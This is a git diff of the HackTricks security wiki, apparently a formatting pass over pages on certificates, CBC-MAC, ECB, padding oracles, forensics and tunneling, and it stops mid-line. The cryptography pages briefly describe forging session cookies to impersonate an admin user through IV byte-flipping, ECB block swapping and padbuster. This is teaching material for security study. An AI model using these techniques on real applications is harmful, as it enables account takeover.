maliciously** issued. -* **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued. +```python +# Example of accessing and using x509 certificate fields programmatically: +from cryptography import x509 +from cryptography.hazmat.backends import default_backend + +# Load an x509 certificate (assuming cert.pem is a certificate file) +with open("cert.pem", "rb") as file: + cert_data = file.read() + certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) + +# Accessing fields +serial_number = certificate.serial_number +issuer = certificate.issuer +subject = certificate.subject +public_key = certificate.public_key() + +print(f"Serial Number: {serial_number}") +print(f"Issuer: {issuer}") +print(f"Subject: {subject}") +print(f"Public Key: {public_key}") +``` + +### **Difference between OCSP and CRL Distribution Points** + +**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). + +### **What is Certificate Transparency** + +Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are: + +* Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge. +* Establishing an open auditing system for tracking mistakenly or maliciously issued certificates. +* Safeguarding users against fraudulent certificates. #### **Certificate Logs** -Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn’t have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party. +Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity. -#### Query +#### **Query** -You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh). +To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh). -## Formats +Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them. -There are different formats that can be used to store a certificate. +## **Formats** -#### **PEM Format** +### **PEM Format** +- Most widely used format for certificates. +- Requires separate files for certificates and private keys, encoded in Base64 ASCII. +- Common extensions: .cer, .crt, .pem, .key. +- Primarily used by Apache and similar servers. -* It is the most common format used for certificates -* Most servers (Ex: Apache) expects the certificates and private key to be in a separate files\ - \- Usually they are Base64 encoded ASCII files\ - \- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\ - \- Apache and similar server uses PEM format certificates +### **DER Format** +- A binary format of certificates. +- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files. +- Common extensions: .cer, .der. +- Often used with Java platforms. -#### **DER Format** +### **P7B/PKCS#7 Format** +- Stored in Base64 ASCII, with extensions .p7b or .p7c. +- Contains only certificates and chain certificates, excluding the private key. +- Supported by Microsoft Windows and Java Tomcat. -* The DER format is the binary form of the certificate -* All types of certificates & private keys can be encoded in DER format -* DER formatted certificates do not contain the "BEGIN CERTIFICATE/END CERTIFICATE" statements -* DER formatted certificates most often use the ‘.cer’ and '.der' extensions -* DER is typically used in Java Platforms +### **PFX/P12/PKCS#12 Format** +- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file. +- Extensions: .pfx, .p12. +- Mainly used on Windows for certificate import and export. -#### **P7B/PKCS#7 Format** +### **Converting Formats** -* The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c -* A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key -* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat +**PEM conversions** are essential for compatibility: -#### **PFX/P12/PKCS#12 Format** +- **x509 to PEM** -* The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file -* These files usually have extensions such as .pfx and .p12 -* They are typically used on Windows machines to import and export certificates and private keys - -### Formats conversions - -**Convert x509 to PEM** - -``` +```bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem ``` -#### **Convert PEM to DER** -``` +- **PEM to DER** +```bash openssl x509 -outform der -in certificatename.pem -out certificatename.der ``` -**Convert DER to PEM** -``` +- **DER to PEM** +```bash openssl x509 -inform der -in certificatename.der -out certificatename.pem ``` -**Convert PEM to P7B** - -**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat. - -``` +- **PEM to P7B** +```bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer ``` -**Convert PKCS7 to PEM** -``` +- **PKCS7 to PEM** +```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem ``` -**Convert pfx to PEM** -**Note:** The PKCS#12 or PFX format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file. PFX files usually have extensions such as .pfx and .p12. PFX files are typically used on Windows machines to import and export certificates and private keys. +**PFX conversions** are crucial for managing certificates on Windows: -``` +- **PFX to PEM** +```bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem ``` -**Convert PFX to PKCS#8**\ -**Note:** This requires 2 commands -**1- Convert PFX to PEM** +- **PFX to PKCS#8** involves two steps: + 1. Convert PFX to PEM -``` +```bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem ``` -**2- Convert PEM to PKCS8** - -``` + 2. Convert PEM to PKCS8 +```bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 ``` -**Convert P7B to PFX**\ -**Note:** This requires 2 commands -1- **Convert P7B to CER** - -``` +- **P7B to PFX** also requires two commands: + 1. Convert P7B to CER +```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer ``` -**2- Convert CER and Private Key to PFX** + 2. Convert CER and Private Key to PFX +```bash +openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer +``` -``` -openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer -``` +***
diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index ec3713216..bbe30b004 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -21,11 +21,11 @@ If the **cookie** is **only** the **username** (or the first part of the cookie # CBC-MAC -In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change** to **any** of the plaintext **bits** will cause the **final encrypted block** to **change** in a way that cannot be predicted or counteracted without knowing the key to the block cipher. +**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. -To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: +To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: -![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) +![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # Vulnerability @@ -63,7 +63,7 @@ If you can control the used IV the attack could be very easy.\ If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**. -# References +## References More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index 02b71f45a..4ddaf5d47 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -80,9 +80,9 @@ So, another way to impersonate the user `admin` would be to: The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin ` -** Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** +**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** -# References +## References * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 4f75fe3ad..59c28f7cf 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -44,7 +44,7 @@ If an attacker wants to append the string "append" he can: {% embed url="https://github.com/iagox86/hash_extender" %} -# References +## References You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index 890262fb3..4a5994b5c 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -19,11 +19,11 @@ Other ways to support HackTricks: In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: -![CBC encryption](https://defuse.ca/images/cbc\_encryption.png) +![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) To decrypt CBC the **opposite** **operations** are done: -![CBC decryption](https://defuse.ca/images/cbc\_decryption.png) +![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png) Notice how it's needed to use an **encryption** **key** and an **IV**. @@ -114,7 +114,7 @@ If you **log in many times** and always get the **same cookie**, there is probab Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster. -# References +## References * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md index 753613771..4368eb8dd 100644 --- a/forensics/basic-forensic-methodology/README.md +++ b/forensics/basic-forensic-methodology/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -96,7 +96,7 @@ Keep in mind the possible use of anti-forensic techniques: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 15171ca4e..4e75ea70e 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -34,7 +34,7 @@ File Integrity Monitoring (FIM) is a critical security technique that protects I * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -# References +## References * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index f2ca64897..63033cf01 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -456,7 +456,7 @@ Do you work in a **cybersecurity company**? Do you want to see your **company ad * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 67786fa78..226b1ab1d 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -66,7 +66,7 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth** * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 1c1306567..1db184503 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -175,7 +175,7 @@ Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftw These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers. -# References +## References * [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a) * [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/) * [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 6d573a124..4dced7582 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -23,7 +23,7 @@ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -**For further details check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)** +For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents. diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 013cdb016..135dd23f0 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -24,7 +24,7 @@ Video challenges often involve container formats that bundle audio and video str This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files. -# References +## References * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 298e74172..16b905ce3 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -26,7 +26,7 @@ The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestud It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data. -# References +## References * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index 7192141db..48f3dcee9 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -127,7 +127,7 @@ mount disk.img /mnt -o ro,offset=$((2048*512)) * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index b08236920..2768e4307 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -719,7 +719,7 @@ There are several tools out there that will perform part of the proposed actions ## **References** -* **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)** +* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) \ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index e6686a7e7..a26e77ec1 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -618,7 +618,7 @@ tunnels: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/linux-hardening/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md index 8fbe4af1e..c4769efff 100644 --- a/linux-hardening/privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -1686,7 +1686,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download 